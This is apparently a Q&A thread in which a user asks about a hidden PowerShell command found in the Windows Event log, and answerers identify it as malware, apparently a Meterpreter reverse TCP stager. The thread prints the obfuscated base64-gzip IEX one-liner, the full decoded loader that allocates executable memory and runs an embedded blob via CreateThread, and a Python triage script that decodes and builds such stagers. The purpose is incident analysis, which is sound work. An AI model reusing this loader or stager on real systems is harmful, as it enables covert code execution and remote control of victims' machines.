
While I was sitting in front of the computer not using it, my Windows 10 machine quickly flashed a few terminal windows, and then gave me a Windows Security popup, asking for my password.

I have no idea what this is for, so I did a little poking around in the file explorer and the Event log, and found a whole series of entries for PowerShell with the following data:

HostApplication=powershell.exe -nop -w hidden -c $s=New-Object IO.MemoryStream(,
[Convert]::FromBase64String(
'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'
));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,
[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

The base64 string decodes to one starting with a valid gzip header (hex 1F 8B 08 ...). I tried unzipping that on my Mac, but ran into an error.

Does anyone have an idea what this is, and is there any chance it is legitimate?

Update : The infected machine is a Win 10 host running in VirtualBox on Mac. Is there any chance the Mac host can be infected? I am assuming that this is something that virtualization prevents, but exploits are always evolving...

AShelly
    Reinstall your machine as soon as possible, this is definitely malicious. – André Borie Sep 11 '15 at 14:15
  • The update is arguably a different question, but for the record: it depends whether the VM has access to the host. VMs *can* be completely isolated, and in that case you're safe (barring the occasional, rare-but-very-exciting bug in the virtualization). However, most people who use a VM for convenience rather than security allow the VM to access the host's file system and so on. In that case, the VM can (though not necessarily will) infect the host. – CBHacking Jun 22 '16 at 16:52
  • Possible duplicate of [How do I deal with a compromised server?](http://security.stackexchange.com/questions/39231/how-do-i-deal-with-a-compromised-server) – André Borie Jul 18 '16 at 13:50
  • @AndréBorie As I read the question, it asks "Am I infected?", not "What do I do if I am infected?" So I would say not a duplicate. – Anders Jul 18 '16 at 14:17
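The outer layer in the Event log entry is a stager: a Base64 literal that decodes to a gzip stream, which is inflated and handed to IEX. The following is an added example (not code from the question or any answer) that triages such a HostApplication line: it flags the indicator tokens, pulls out the Base64 literal, tolerates padding lost in copy/paste, checks for the 1F 8B 08 gzip header before inflating, and returns the inner script. The payload it is run on is a constructed benign stand-in, because the real blob is not reproduced on this page; the function names are mine.

```python
"""Triage a PowerShell "FromBase64String -> GzipStream -> IEX" one-liner.

Added example, not code from the original post. The command-line shape is the
one shown in the Event log entry above; the payload built here is a CONSTRUCTED
benign stand-in, since the real blob is not reproduced on this page.
"""
import base64
import gzip
import re

GZIP_MAGIC = b"\x1f\x8b\x08"  # gzip header ID1 ID2 CM=deflate, as noted in the question

# Base64 literal handed to [Convert]::FromBase64String('...') or ("...");
# logs often wrap the literal, so whitespace inside it is tolerated.
_B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")

# Tokens that together mark the stager shape seen in the question
# (simplified: real logs may also spell -w as -WindowStyle, -nop as -NoProfile).
STAGER_INDICATORS = ("-nop", "-w hidden", "IEX", "FromBase64String", "GzipStream")


def stager_indicators(cmdline):
    """Return which stager indicators occur in a HostApplication line."""
    low = cmdline.lower()
    return [tok for tok in STAGER_INDICATORS if tok.lower() in low]


def extract_b64(cmdline):
    """Pull the first Base64 literal out of the command line."""
    m = _B64_LITERAL.search(cmdline)
    if not m:
        raise ValueError("no FromBase64String(...) literal found")
    return re.sub(r"\s+", "", m.group(1))


def b64decode_lenient(s):
    """Decode Base64 even when '=' padding was lost while copying from a log."""
    s = s.rstrip("=")
    return base64.b64decode(s + "=" * (-len(s) % 4))


def decode_stager(cmdline):
    """Decode the literal and, if it is gzip, inflate it to the inner script.

    Returns a dict: raw (decoded bytes), gzip (bool), script (str or None).
    A non-gzip payload is returned raw rather than guessed at.
    """
    raw = b64decode_lenient(extract_b64(cmdline))
    if not raw.startswith(GZIP_MAGIC):
        return {"raw": raw, "gzip": False, "script": None}
    return {"raw": raw, "gzip": True,
            "script": gzip.decompress(raw).decode("utf-8", errors="replace")}


def build_sample_stager(inner_script):
    """CONSTRUCTED sample: wrap a script exactly the way the logged stager does."""
    blob = base64.b64encode(gzip.compress(inner_script.encode("utf-8"))).decode("ascii")
    return ("powershell.exe -nop -w hidden -c $s=New-Object IO.MemoryStream(,"
            "[Convert]::FromBase64String('" + blob + "'));"
            "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,"
            "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();")


if __name__ == "__main__":
    cmd = build_sample_stager("Write-Output 'inner script (constructed, benign)'")
    print("indicators:", stager_indicators(cmd))
    print(decode_stager(cmd)["script"])
```

Feed a real HostApplication value to decode_stager and read the returned script before running anything; if gzip is False, the literal was not a gzip stream and the decoding chain in the command line should be re-read rather than forced through gunzip.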

4 Answers


It decompresses just fine for me... I converted the Base64 string into binary, then ran gunzip on it (I am using a Linux system here). This results in another piece of PowerShell that does things which can only be considered as definitely fishy. It contains a piece of 450 bytes, that it loads into (native) RAM, and runs as code. I am way too lazy to disassemble the piece of code, but I feel pretty safe when I say that this piece of code is not safe at all.

Looks like there is some malware in your machine, that tries to gain some privileges. It's time for some nuking, I'd say.

Tom Leek

Posting this in an answer, because it's too big for a comment: I don't know what it does (though it does look sketchy) but here's the expansion. It's a PS script itself, of course:

function t2Mj {
    Param ($hVrV8B2fWj, $zfOqpP8)                
    $mJnysoxSPX = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

    return $mJnysoxSPX.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($mJnysoxSPX.GetMethod('GetModuleHandle')).Invoke($null, @($hVrV8B2fWj)))), $zfOqpP8))
}

function j1G8vwsPg {
    Param (
            [Parameter(Position = 0, Mandatory = $True)] [Type[]] $srs_LF,
            [Parameter(Position = 1)] [Type] $lTMpjL3Mn = [Void]
    )

    $b0pq = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $b0pq.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $srs_LF).SetImplementationFlags('Runtime, Managed')
    $b0pq.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $lTMpjL3Mn, $srs_LF).SetImplementationFlags('Runtime, Managed')

    return $b0pq.CreateType()
}

# decode the embedded byte blob that will be executed
[Byte[]]$wgOO3l = [System.Convert]::FromBase64String("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")

# VirtualAlloc(NULL, blob length, 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE)
$zk1lmz = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((t2Mj kernel32.dll VirtualAlloc), (j1G8vwsPg @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $wgOO3l.Length,0x3000, 0x40)
# copy the blob into the RWX buffer
[System.Runtime.InteropServices.Marshal]::Copy($wgOO3l, 0, $zk1lmz, $wgOO3l.length)

# CreateThread with the buffer as the start address, then block until the thread exits
$oFpHGWmDM = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((t2Mj kernel32.dll CreateThread), (j1G8vwsPg @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$zk1lmz,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((t2Mj kernel32.dll WaitForSingleObject), (j1G8vwsPg @([IntPtr], [Int32]))).Invoke($oFpHGWmDM,0xffffffff) | Out-Null

Definitely looks questionable. I don't recognize it, though.

CBHacking
    Thanks for this. I did a little formatting and renaming, and came to the same conclusion as @Tom Leek. It is allocating and filling memory with the contents of the decoded base64 blob, and marking that memory as executable. It is calling CreateThread and giving it that address, then waiting for the thread to finish. – AShelly Sep 10 '15 at 21:19
  • The Blob disassembles into this: https://www.onlinedisassembler.com/odaweb/Ralv0gEB/0. It contains the string "AQARPQVH1" which [Google only finds on Malware analysis pages](https://www.google.com/search?q=AQAPRQVH1). It's not looking good. – AShelly Sep 10 '15 at 21:47

I had a machine with two similar registry entries.

I tried the following scanners to see if they would pick up the dodgy script in the registry and none of these picked them up at the time of writing: AVG, Kaspersky tdsskiller, rKill, Malwarebytes, HitmanPro, Zemana Antimalware, adware cleaner, Junkware Removal Tool, Emsisoft, Hijackthis, UsbFix, CCleaner and Smadav.

The ones I haven't tried yet are RogueKiller and Symantec's scanner; both of these had articles or mentions of this "Powerworm" or PowerShell kind of behaviour. Either way, it's a very clever way to hide malware on the machine, as most scanners are just missing this method of hiding in the registry.


This is a Metasploit Meterpreter shell trying a reverse TCP connection, basically injecting a service (DLL) into a process and getting a shell.